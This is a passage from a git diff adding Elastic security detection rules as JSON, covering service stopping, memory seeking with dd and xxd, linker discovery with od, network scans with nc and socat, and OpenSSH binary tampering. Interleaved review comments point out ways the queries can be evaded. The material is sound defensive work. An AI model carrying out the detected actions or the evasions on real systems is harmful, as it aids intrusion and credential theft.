Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and\n process.args:(stop or pause or delete or \"/PID\" or \"/IM\" or \"/T\" or \"/F\" or \"/t\" or \"/f\" or \"/im\" or \"/pid\") and\n not process.parent.name:osquerybeat.exe\n", + "references": [ + "https://www.elastic.co/security-labs/luna-ransomware-attack-pattern" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "035889c4-2686-4583-a7df-67f89c292f2c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 109 + }, + "id": "035889c4-2686-4583-a7df-67f89c292f2c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_1.json b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_1.json new file mode 100644 index 00000000000..d458e12ecd0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_1.json 
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Monitors for the execution of Unix utilities that may be leveraged as memory address seekers. Attackers may leverage built-in utilities to seek specific memory addresses, allowing for potential future manipulation/exploitation.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Memory Seeking Activity",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"tail\" and process.args == \"-c\") or\n (process.name == \"cmp\" and process.args == \"-i\") or\n (process.name in (\"hexdump\", \"xxd\") and process.args == \"-s\") or\n (process.name == \"dd\" and process.args : (\"skip*\", \"seek*\"))\n)\n",
+ "references": [
+ "https://github.com/arget13/DDexec"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "035a6f21-4092-471d-9cda-9e379f459b1e",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Rule Type: BBR",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1057",
+ "name": "Process Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1057/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 1
+ },
+ "id": "035a6f21-4092-471d-9cda-9e379f459b1e_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_2.json b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_2.json
new file mode 100644
index 00000000000..8fee74b35ac
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_2.json
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Monitors for the execution of Unix utilities that may be leveraged as memory address seekers. Attackers may leverage built-in utilities to seek specific memory addresses, allowing for potential future manipulation/exploitation.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Memory Seeking Activity",
+ "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and (\n (process.name == \"tail\" and process.args == \"-c\") or\n (process.name == \"cmp\" and process.args == \"-i\") or\n (process.name in (\"hexdump\", \"xxd\") and process.args == \"-s\") or\n (process.name == \"dd\" and process.args : (\"skip*\", \"seek*\"))\n)\n",
+ "references": [
+ "https://github.com/arget13/DDexec"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "035a6f21-4092-471d-9cda-9e379f459b1e",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Rule Type: BBR",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1057",
+ "name": "Process Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1057/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": "035a6f21-4092-471d-9cda-9e379f459b1e_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_1.json b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_1.json
new file mode 100644
index 00000000000..4a16728f415
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_1.json
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for dynamic linker discovery via the od utility. od (octal dump) is a command-line utility in Unix operating systems used for displaying data in various formats, including octal, hexadecimal, decimal, and ASCII, primarily used for examining and debugging binary files or data streams. Attackers can leverage od to analyze the dynamic linker by identifying injection points and craft exploits based on the observed behaviors and structures within these files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Dynamic Linker Discovery via od", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name == \"od\" and process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_2.json b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_2.json new file mode 100644 index 00000000000..5e99da927b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_2.json 
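Review bot: The `process.args in (...)` list in `"query"` is an exact string match on absolute paths, so `cd /lib64 && od ld-linux-x86-64.so.2`, a path with a redundant component (`/lib64/./ld-linux-x86-64.so.2`), or an attacker-created symlink reads the same bytes without matching. A suffix pattern such as `process.args : ("*ld-linux-x86-64.so.2", "*/ld.so.preload")` would be more robust at the cost of a few more benign hits, and `"description"` should state that the rule is scoped to x86_64 glibc paths since those are the only values listed. Both points are inferred from the visible query, not from the data sources.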
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for dynamic linker discovery via the od utility. od (octal dump) is a command-line utility in Unix operating systems used for displaying data in various formats, including octal, hexadecimal, decimal, and ASCII, primarily used for examining and debugging binary files or data streams. Attackers can leverage od to analyze the dynamic linker by identifying injection points and craft exploits based on the observed behaviors and structures within these files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Dynamic Linker Discovery via od", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"od\" and process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration 
Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3.json b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3.json new file mode 100644 index 00000000000..caca9fe3496 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3.json 
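Review bot: The `process.args in (...)` list in `"query"` names only x86_64 glibc loader paths, so the same DDexec-style reconnaissance on arm64 hosts (`/lib/ld-linux-aarch64.so.1`), 32-bit x86 (`/lib/ld-linux.so.2`) or musl-based images (`/lib/ld-musl-*.so.1`) is not covered; a wildcard such as `process.args : ("*/ld-linux-*.so.*", "*/ld-musl-*.so.*", "/etc/ld.so.preload")` or adding those paths explicitly would close the gap. This version also admits the auditd `executed`/`process_started` actions, so it is worth confirming that the `auditd_manager` data source populates `process.args` as full argument strings the way Defend does, otherwise the `in` match is dead for those events. The non-x86_64 loader paths are the conventional locations rather than something visible in this hunk.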
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Network Scan Executed From Host", + "query": "event.category:process and host.os.type:linux and event.action:(exec or exec_event or executed or process_started) and\nevent.type:start and process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "03c23d45-d3cb-4ad4-ab5d-b361ffe8724a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "process.args", + "value": 100 + } + ], + "field": [ + "host.id", + "process.parent.entity_id", + "process.executable" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 3 + }, + "id": "03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_109.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_109.json new file mode 100644 index 00000000000..d503d3c25e8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_109.json 
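Review bot: The `process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat)` list in `"query"` omits `fping` and `arping`, which are the built-in tools most often used for sweeps on a host without a mapper and which fit the rationale in `"description"`; consider `process.name:(ping or fping or arping or nping or ... or socat)`. The threshold requires 100 distinct `process.args` values per `host.id` / `process.parent.entity_id` / `process.executable` within `now-9m`, so a loop that forks a subshell per target spreads the sweep across parent buckets and may stay under the cardinality, which is worth stating in a `"note"` field that this rule currently lacks. Whether such children receive distinct parent entity ids depends on the data source and is not visible here.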
@@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration.", + "false_positives": [ + "Trusted OpenSSH executable updates. It's recommended to verify the integrity of OpenSSH binary changes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of OpenSSH Binaries", + "note": "## Triage and analysis\n\n### Investigating Modification of OpenSSH Binaries\n\nOpenSSH is a widely used suite of secure networking utilities based on the Secure Shell (SSH) protocol, which provides encrypted communication sessions over a computer network.\n\nAdversaries may exploit OpenSSH by modifying its binaries, such as `/usr/bin/scp`, `/usr/bin/sftp`, `/usr/bin/ssh`, `/usr/sbin/sshd`, or `libkeyutils.so`, to gain unauthorized access or exfiltrate SSH credentials.\n\nThe detection rule 'Modification of OpenSSH Binaries' is designed to identify such abuse by monitoring file changes in the Linux environment. It triggers an alert when a process, modifies any of the specified OpenSSH binaries or libraries. This helps security analysts detect potential malicious activities and take appropriate action.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open 
Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- Regular users should not need to modify OpenSSH binaries, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:file and host.os.type:linux and event.type:change and \n process.name:(* and not (dnf or dnf-automatic or dpkg or yum or rpm or yum-cron or anacron or platform-python)) and \n (file.path:(/usr/bin/scp or \n /usr/bin/sftp or \n /usr/bin/ssh or \n /usr/sbin/sshd) or \n file.name:libkeyutils.so) and\n not process.executable:/usr/share/elasticsearch/*\n", + "references": [ + "https://blog.angelalonso.es/2016/09/anatomy-of-real-linux-intrusion-part-ii.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0415f22a-2336-45fa-ba07-618a5942e22c", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
